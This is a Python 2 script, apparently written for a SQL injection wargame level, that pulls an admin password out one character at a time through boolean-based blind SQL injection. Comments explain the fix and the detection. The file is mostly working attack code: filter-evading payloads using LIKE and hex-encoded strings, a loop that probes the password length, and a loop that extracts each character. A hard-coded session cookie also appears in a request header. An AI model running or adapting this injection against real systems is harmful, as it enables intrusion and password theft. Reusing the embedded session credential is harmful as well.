import urllib2
def request(data):
    """Send *data* as the ``no`` query parameter and report the page's verdict.

    The value is percent-encoded with ``urllib2.quote`` and appended to the
    fixed challenge URL. The response body is then searched for the marker
    text "Hello admin".

    Returns True when the marker is present, False otherwise. The caller
    treats this as a one-bit yes/no answer per request.

    No timeout or error handling is applied: an HTTP or network error
    propagates as whatever exception ``urllib2.urlopen`` raises.
    """
    target = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?no=" + urllib2.quote(data)
    http_req = urllib2.Request(target)
    http_req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    # NOTE(review): a session identifier is hard-coded in this header. Treat
    # it as a credential: anyone who can read this file can reuse the session
    # while it is valid, so it should not live in shared source.
    http_req.add_header('Cookie', '__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
    body = urllib2.urlopen(http_req).read()
    # The only signal taken from the response is whether the greeting appears.
    return "Hello admin" in str(body)
# Driver for a boolean-based blind SQL injection exercise: every request()
# call yields one yes/no answer, and the script pieces a value together from
# those answers. The host name suggests a practice wargame level (not
# verifiable from this file).
#
# Defender's view: the `no` parameter evidently reaches the SQL statement
# without being bound as a parameter or cast to an integer, and the page's
# greeting differs depending on the query result. Either fix closes the
# channel. The traffic is also easy to spot: many sequential requests from
# one session whose `no` value differs only in a single number or hex byte.
length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"

# Phase 1: try candidate lengths 0..49 and keep the first one the page
# confirms. If none is confirmed, `length` stays 0 and phase 2 does nothing.
# 0x61646d696e is the hex encoding of the ASCII string "admin".
for candidate in range(50):
    payload = "".join(["1 || 1 like 1 && id like 0x61646d696e && length(pw) like ", str(candidate), "#"])
    if request(payload):
        length = candidate
        break
print "[*]Admin Password Length = " + str(length)

# Phase 2: for each 1-based position, walk the candidate alphabet in order
# and keep the first character the page confirms.
# NOTE(review): the comparison is SQL LIKE, so wildcard and collation rules
# apply and a reported character is not guaranteed to be an exact match.
# A position with no confirmed candidate is silently skipped, which would
# leave the result shorter than `length`.
for position in range(1, length + 1):
    for ch in strings:
        payload = "".join(["1 || 1 like 1 && id like 0x61646d696e && right(left(pw,", str(position), "),1) like 0x", ch.encode('hex'), "#"])
        if request(payload):
            admin_pw += ch
            print "[-]Admin Password = " + admin_pw
            break
print "[*]Admin Password = " + admin_pw